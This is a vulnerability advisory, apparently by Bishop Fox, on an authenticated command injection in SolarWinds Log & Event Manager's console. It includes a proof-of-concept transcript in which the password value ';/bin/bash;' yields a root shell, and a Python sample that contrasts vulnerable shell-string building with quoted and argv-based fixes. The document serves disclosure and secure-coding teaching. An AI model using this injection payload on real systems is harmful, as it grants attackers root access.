April 10, 2017
February 7, 2017
SolarWinds
SolarWinds Log & Event Manager (LEM) before 6.3.1 Hotfix 4
The Bishop Fox assessment team discovered an arbitrary command injection vulnerability within the SolarWinds Log & Event Manager (LEM) management console (CMC). The CMC is a restricted environment that provides functionality for upgrading and maintaining LEM appliances. The vulnerability allows an authenticated user to bypass the restrictions imposed by the CMC and execute arbitrary commands on the vulnerable system as the root user.
The vendor has been notified and has issued patches.
To demonstrate the impact of this vulnerability, the assessment team injected shell syntax into the password prompt of the CMC's exportsyslog function, breaking out of the LEM application and obtaining a system shell:
cmc> appliance
cmc::acm# exportsyslog
Press <enter> to begin export syslog process.
Available Log Files:
1. ( 53 kB) Authentication log
…omitted for brevity…
Log groups selected: 1 ( 1 kB )
Select log files to include (q to quit, * for all, n for none, twice to toggle): q
Please enter the network share path (e.g. \\myserver\myshare): \\server\share
Is the path \\server\share correct? <Y/n>
Please enter the username, including any domain information (e.g. DOMAIN\user): mydomain\user
Is the user mydomain\user correct? <Y/n>
Please enter the password: ';/bin/bash;'
Please verify the password: ';/bin/bash;'
Creating logfile archive...done.
Usage: smbclient [-?EgBVNkPeC] [-?|--help] [--usage]
[-R|--name-resolve=NAME-RESOLVE-ORDER] [-M|--message=HOST]
…omitted for brevity…
[-C|--use-ccache] service <password>
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # uname -a
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 GNU/Linux
As shown in the proof of concept above, the research team fully compromised the affected system by exploiting this vulnerability.
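The root cause shown in the proof of concept is the CWE-78 pattern: a value typed at a prompt is interpolated into a command line that a shell parses, so a single quote in the password closes the quoting and a following semicolon starts a new command. The example below is added here and is not LEM's code or Bishop Fox's; the smbclient invocation shape, the share name, the user name and the benign password are assumptions. It contrasts the weak string-building form with two fixes (shlex.quote for an unavoidable shell string, and an argument vector that never reaches a shell) and includes a check that counts how many commands a shell would see in a given line.

```python
import shlex
from typing import List

# Constructed sample inputs (not values from the advisory's appliance): the share
# and user mirror the prompts in the proof of concept, the injected password is
# the payload shape shown there, and the benign password is made up.
SHARE = r"\\server\share"
USER = r"mydomain\user"
BENIGN_PASSWORD = "Winter2017!"
INJECTED_PASSWORD = "';/bin/bash;'"
SMB_ACTION = "put lem-logs.tar.gz"  # assumed smbclient sub-command, not LEM's own


def build_command_vulnerable(share: str, user: str, password: str) -> str:
    """CWE-78 pattern: user input interpolated into one string that a shell
    will parse. Wrapping the password in single quotes does not help, because
    the first quote character in the input closes the quoting."""
    return f"smbclient '{share}' -U '{user}%{password}' -c '{SMB_ACTION}'"


def build_command_quoted(share: str, user: str, password: str) -> str:
    """Fix when a shell string is unavoidable: every interpolated piece goes
    through shlex.quote(), which re-quotes embedded quote characters so the
    whole value stays inside a single shell word."""
    return " ".join([
        "smbclient",
        shlex.quote(share),
        "-U",
        shlex.quote(f"{user}%{password}"),
        "-c",
        shlex.quote(SMB_ACTION),
    ])


def build_command_hardened(share: str, user: str, password: str) -> List[str]:
    """Preferred fix: an argument vector handed straight to the program
    (subprocess.run(argv) with the default shell=False). No shell ever sees
    the password, so no character in it can end an argument or start a
    second command."""
    return ["smbclient", share, "-U", f"{user}%{password}", "-c", SMB_ACTION]


def count_shell_commands(command_line: str) -> int:
    """Tokenize a command line the way a POSIX shell would and count the
    separate commands it contains. A correctly quoted invocation of one
    program yields 1; anything higher means input escaped its quoting."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    separators = {";", "&", "&&", "|", "||"}
    return 1 + sum(1 for token in lexer if token in separators)


if __name__ == "__main__":
    for label, password in (("benign", BENIGN_PASSWORD), ("injected", INJECTED_PASSWORD)):
        weak = build_command_vulnerable(SHARE, USER, password)
        safe = build_command_quoted(SHARE, USER, password)
        print(f"{label}: vulnerable string parses as {count_shell_commands(weak)} command(s)")
        print(f"{label}: quoted string parses as {count_shell_commands(safe)} command(s)")
    print("argv form keeps the password as one argument:",
          build_command_hardened(SHARE, USER, INJECTED_PASSWORD)[3])
```

With the injected password the vulnerable string tokenizes into three commands (the truncated smbclient invocation, /bin/bash, and the leftover fragment), which matches the sequence of smbclient usage output followed by a root shell in the proof of concept; both fixed forms keep the entire password inside one argument.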
Baker Hamilton, MD, MMSc of Bishop Fox
For Reference
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
LEM V6.3.1 HOT FIX 4 IS NOW AVAILABLE
The team at Bishop Fox would like to thank SolarWinds for their cooperation in quickly resolving this matter!